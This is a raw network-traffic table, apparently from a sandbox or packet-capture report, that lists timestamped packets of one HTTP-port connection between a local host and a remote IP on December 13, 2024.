                                                                                                                                                                                                Dec 13, 2024 08:18:56.253362894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.253473043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.253515959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.254508972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.254648924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.254693031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.255831957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.255844116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.255927086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.256925106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.257021904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.257097006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.258183956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.258223057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.258275032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.259370089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.259658098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.260534048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.260632992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.260648966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.261694908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.261784077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.261825085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.261869907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.262921095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.262990952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.263036013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.264081001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.264200926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.264256954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.265283108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.265391111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.265486956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.266557932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.266724110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.266767979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.267668962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.267779112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.267816067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.268887043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.268934011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.268978119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.270065069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.270204067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.271289110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.271300077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.271363974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.271411896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.272468090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.272558928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.272593975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.273817062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.273828983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.273874044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.274856091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.274940014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.276048899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.276103020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.276134014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.276153088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.277219057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.277333021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.277369976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.278426886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.278520107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.278565884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.279612064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.279669046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.279757023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.280826092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.280889988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.280931950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.282102108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.282114983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.282152891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.283185005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.283297062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.283381939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.284379005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.284614086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.284710884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.285672903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.285775900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.285813093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.286766052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.286885977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.286916971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.287998915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.288126945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.288202047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.289262056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.289273977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.289309025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.290360928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.290477991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.290514946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.291743040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.291754961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.291793108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.292762995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.292833090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.292900085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.293945074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.294028997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.294059992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.295140982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.295301914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.295335054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.296339035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.296441078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.296504021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.297574997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.297730923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.297801018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.298926115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.298939943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.298979044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.299909115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.300010920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.300049067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.301112890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.301140070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.301208019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.302292109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.302385092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.302422047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.303503990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.303615093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.303646088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.304701090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.305114985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.305198908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.305881977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.305988073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.306047916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.307198048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.307210922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.307251930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.308283091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.308346033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.308383942 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.309484959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.309523106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.309556961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.310678959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.310784101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.310848951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.311944962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.311995983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.312040091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.313075066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.313210964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.313249111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.314434052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.314450026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.314532042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.315465927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.315610886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.315654993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.316667080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.316742897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.316790104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.317858934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.318006992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.318072081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.319014072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.319134951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.319195986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.320195913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.320297003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.320338964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.321393967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.321511030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.321551085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.322738886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.322752953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.322818995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.323798895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.323939085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.323985100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.325160980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.325174093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.325210094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.326222897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.326328993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.326370955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.327364922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.327434063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.327533007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.328561068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.328684092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.328727961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.329821110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.329833984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.329871893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.330949068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.331058979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.331135035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.332288027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.332300901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.332340956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.333472013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.333539963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.333575010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.334625006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.334664106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.334700108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.335762024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.335839033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.335920095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.337013960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.337104082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.337148905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.338119984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.338232994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.338269949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.339364052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.339633942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.339709044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.340646982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.340658903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.340734005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.341840029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.341873884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.341907024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.342894077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.342962980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.343189001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.344098091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.344121933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.344192982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.345411062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.345498085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.345562935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.346528053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.346647978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.346688032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.347678900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.347799063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.347836971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.348882914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.348927975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.348968983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.350071907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.350137949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.350208998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.351263046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.351486921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.351536989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.352464914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.352579117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.352623940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.353707075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.353933096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.354001999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.354832888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.354940891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.355015993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.356057882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.356179953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.356223106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.357225895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.357342958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.357377052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.358441114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.358566046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.358596087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.359616995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.359719038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.359778881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.360800982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.360889912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.360955000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.361999989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.362112045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.362175941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.363229990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.363348007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.363408089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.364408970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.364572048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.364612103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.365580082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.365624905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.365662098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.366859913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.366972923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.367010117 CET4972680192.168.2.11185.81.68.147
